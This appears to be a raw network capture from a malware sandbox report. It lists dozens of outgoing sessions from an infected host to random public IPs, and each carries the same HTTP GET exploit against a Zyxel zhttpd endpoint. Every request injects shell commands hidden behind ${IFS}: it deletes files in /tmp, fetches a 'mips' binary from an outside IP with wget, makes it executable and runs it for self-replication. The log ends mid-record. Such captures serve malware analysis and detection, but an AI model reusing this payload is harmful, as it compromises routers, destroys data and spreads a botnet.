                              Mar 31, 2024 08:41:10.595371008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1664192.168.2.134017668.216.123.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595403910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1665192.168.2.135083259.26.95.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595439911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1666192.168.2.1344046209.143.17.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595500946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1667192.168.2.1345556128.129.238.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595531940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1668192.168.2.136011667.84.136.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595586061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1669192.168.2.135876244.162.141.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595617056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1670192.168.2.1357416137.234.68.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595649004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1671192.168.2.1355644111.176.239.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595721006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1672192.168.2.1341446166.226.252.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595755100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1673192.168.2.1350336117.172.217.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595788002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1674192.168.2.1334346117.242.132.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595818996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1675192.168.2.135991859.190.107.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595875025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1676192.168.2.135861082.111.19.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595894098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1677192.168.2.133741070.37.44.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.595956087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1678192.168.2.133445672.0.117.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596009016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1679192.168.2.134605477.57.128.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596050978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1680192.168.2.135518899.55.213.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596091032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1681192.168.2.135878867.40.112.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596131086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1682192.168.2.1335848181.197.67.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596169949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1683192.168.2.135392020.147.219.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596204996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1684192.168.2.134164669.176.145.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596235991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1685192.168.2.1354464112.79.227.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596276045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1686192.168.2.1351242155.50.89.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596316099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1687192.168.2.135384484.131.15.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596348047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1688192.168.2.1346684134.33.161.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596396923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1689192.168.2.1334424125.1.77.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596410036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1690192.168.2.1336734160.188.223.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596443892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1691192.168.2.134312636.222.121.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596494913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1692192.168.2.1343422106.193.249.185443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596529961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1693192.168.2.1347816181.43.224.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596556902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1694192.168.2.1353760179.132.63.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596606970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1695192.168.2.133917453.174.121.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596653938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1696192.168.2.134380295.88.220.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596669912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1697192.168.2.1335392123.211.29.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596716881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1698192.168.2.1344728173.129.205.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596744061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1699192.168.2.1358300221.27.198.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596795082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1700192.168.2.135173013.83.91.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596833944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1701192.168.2.1352676113.84.135.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596865892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1702192.168.2.134839093.13.33.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596911907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1703192.168.2.135947894.35.20.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596940041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1704192.168.2.1332848126.216.47.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.596980095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1705192.168.2.1345064206.103.17.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597017050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1706192.168.2.135521858.26.124.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597031116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1707192.168.2.1343930153.131.182.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597078085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1708192.168.2.135130451.124.17.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597130060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1709192.168.2.1338248168.78.180.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597167015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1710192.168.2.1345886165.158.17.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597208023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1711192.168.2.1335724211.148.47.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597243071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1712192.168.2.135308498.161.123.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597296953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1713192.168.2.1336106172.69.199.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597316980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1714192.168.2.1354696151.65.173.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597349882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1715192.168.2.1357020120.171.186.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597393990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1716192.168.2.134266649.153.176.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597414970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1717192.168.2.1341276114.123.23.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597453117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1718192.168.2.134486284.56.67.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597487926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1719192.168.2.1359226185.8.132.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597532034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1720192.168.2.135127470.182.46.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597573042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1721192.168.2.1353260160.123.217.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597610950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1722192.168.2.133495214.31.60.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597645998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1723192.168.2.135282834.242.153.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597681999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1724192.168.2.135114490.167.1.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597719908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1725192.168.2.135937269.204.70.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597747087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1726192.168.2.1346020194.77.189.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597788095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1727192.168.2.1348704218.162.187.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597843885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1728192.168.2.134500834.225.43.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597892046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1729192.168.2.1359800163.200.244.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597932100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1730192.168.2.1355562140.102.165.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.597970009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1731192.168.2.133939839.110.109.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:10.598017931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1732192.168.2.135510067.69.230.164443
                              TimestampBytes transferredDirectionData
